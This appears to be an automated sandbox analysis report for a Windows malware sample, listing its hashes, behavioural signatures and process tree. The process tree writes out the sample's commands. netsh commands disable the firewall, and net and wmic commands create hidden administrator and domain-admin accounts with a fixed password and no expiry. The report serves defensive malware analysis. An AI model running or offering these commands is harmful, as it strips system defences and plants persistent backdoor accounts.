Resubmissions

31-08-2023 12:31

230831-pp5gasef7w 9

31-08-2023 12:09

230831-pbznwsfa54 10

Analysis

  • max time kernel
    99s
  • max time network
    94s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230824-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20230824-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    31-08-2023 12:09

General

  • Target

    malware200.exe

  • Size

    448KB

  • MD5

    957302c7e0c9e025397c2e3cfdc0fef3

  • SHA1

    10ac72a20ac5cd28c94199899fe2eae6ed5b3a84

  • SHA256

    ae1dab47fae0307831ec90b249d26ab4d783fd1fbfebf98a2448d40932885bbd

  • SHA512

    e1443c86e1acb84c5ecb80db5ecca931882478bfdc792c99875eef93b028ba169433dfa2fea8c7a6ee78a3792108172fb8d2e41103a76c77f8d67ee967948ebc

  • SSDEEP

    12288:oquErHF6xC9D6DmR1J98w4oknqOOCyQf1vYOUlsxd:prl6kD68JmlotQfhHUl4

Score
9/10

Malware Config

Signatures

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Modifies Windows Firewall 1 TTPs 3 IoCs
  • Modifies WinLogon 2 TTPs 5 IoCs
  • AutoIT Executable 3 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Runs net.exe
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k netsvcs -p
    1⤵
    • Drops file in System32 directory
    • Checks processor information in registry
    • Enumerates system info in registry
    PID:4324
  • C:\Users\Admin\AppData\Local\Temp\malware200.exe
    "C:\Users\Admin\AppData\Local\Temp\malware200.exe"
    1⤵
    • Modifies WinLogon
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:5096
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh firewall set opmode Disable
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:264
      • C:\Windows\SysWOW64\netsh.exe
        netsh firewall set opmode Disable
        3⤵
        • Modifies Windows Firewall
        PID:1692
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state off
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4552
      • C:\Windows\SysWOW64\netsh.exe
        netsh advfirewall set allprofiles state off
        3⤵
        • Modifies Windows Firewall
        PID:3192
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c netsh advfirewall set currentprofile state off
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1596
      • C:\Windows\SysWOW64\netsh.exe
        netsh advfirewall set currentprofile state off
        3⤵
        • Modifies Windows Firewall
        PID:3200
    • C:\Windows\SysWOW64\net.exe
      net user AstNet h3lp12desk /expires:never /add
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2900
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 user AstNet h3lp12desk /expires:never /add
        3⤵
        PID:1276
    • C:\Windows\SysWOW64\net.exe
      net localgroup administrators AstNet /add
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3348
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 localgroup administrators AstNet /add
        3⤵
        PID:3404
    • C:\Windows\SysWOW64\net.exe
      net localgroup "remote desktop users" AstNet /add
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1944
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 localgroup "remote desktop users" AstNet /add
        3⤵
        PID:1352
    • C:\Windows\SysWOW64\net.exe
      net group "domain admins" AstNet /add
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4464
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 group "domain admins" AstNet /add
        3⤵
        PID:2308
    • C:\Windows\SysWOW64\net.exe
      net user AstNet /active:yes
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4636
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 user AstNet /active:yes
        3⤵
        PID:3432
    • C:\Windows\SysWOW64\net.exe
      net user AstNet /expires:never
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3944
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 user AstNet /expires:never
        3⤵
        PID:4616
    • C:\Windows\SysWOW64\net.exe
      net user AstNet h3lp12desk
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4996
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 user AstNet h3lp12desk
        3⤵
        PID:400
    • C:\Windows\SysWOW64\net.exe
      net user server_sys h3lp12desk /expires:never /add
      2⤵
      PID:892
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 user server_sys h3lp12desk /expires:never /add
        3⤵
        PID:4216
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /C "wmic path Win32_UserAccount where Name="AstNet" set PasswordExpires=false"
      2⤵
      PID:2908
      • C:\Windows\SysWOW64\Wbem\WMIC.exe
        wmic path Win32_UserAccount where Name="AstNet" set PasswordExpires=false
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2664
    • C:\Windows\SysWOW64\net.exe
      net localgroup administrators server_sys /add
      2⤵
      PID:2444
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 localgroup administrators server_sys /add
        3⤵
        PID:2644
    • C:\Windows\SysWOW64\net.exe
      net localgroup "remote desktop users" server_sys /add
      2⤵
      PID:3840
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 localgroup "remote desktop users" server_sys /add
        3⤵
        PID:4316
    • C:\Windows\SysWOW64\net.exe
      net group "domain admins" server_sys /add
      2⤵
      PID:2112
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 group "domain admins" server_sys /add
        3⤵
        PID:4752
    • C:\Windows\SysWOW64\net.exe
      net user server_sys /active:yes
      2⤵
      PID:2400
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 user server_sys /active:yes
        3⤵
        PID:4080
    • C:\Windows\SysWOW64\net.exe
      net user server_sys /expires:never
      2⤵
      PID:3372
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 user server_sys /expires:never
        3⤵
        PID:4816
    • C:\Windows\SysWOW64\net.exe
      net user server_sys h3lp12desk
      2⤵
      PID:4364
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 user server_sys h3lp12desk
        3⤵
        PID:4520
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /C "wmic path Win32_UserAccount where Name="server_sys" set PasswordExpires=false"
      2⤵
      PID:2584
      • C:\Windows\SysWOW64\Wbem\WMIC.exe
        wmic path Win32_UserAccount where Name="server_sys" set PasswordExpires=false
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3404
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
    PID:1284

Network

MITRE ATT&CK Enterprise v15


Downloads

  • memory/5096-0-0x0000000000BE0000-0x0000000000CEC000-memory.dmp
    Filesize: 1.0MB
  • memory/5096-11-0x0000000000BE0000-0x0000000000CEC000-memory.dmp
    Filesize: 1.0MB
  • memory/5096-12-0x0000000000BE0000-0x0000000000CEC000-memory.dmp
    Filesize: 1.0MB
  • memory/5096-13-0x0000000000BE0000-0x0000000000CEC000-memory.dmp
    Filesize: 1.0MB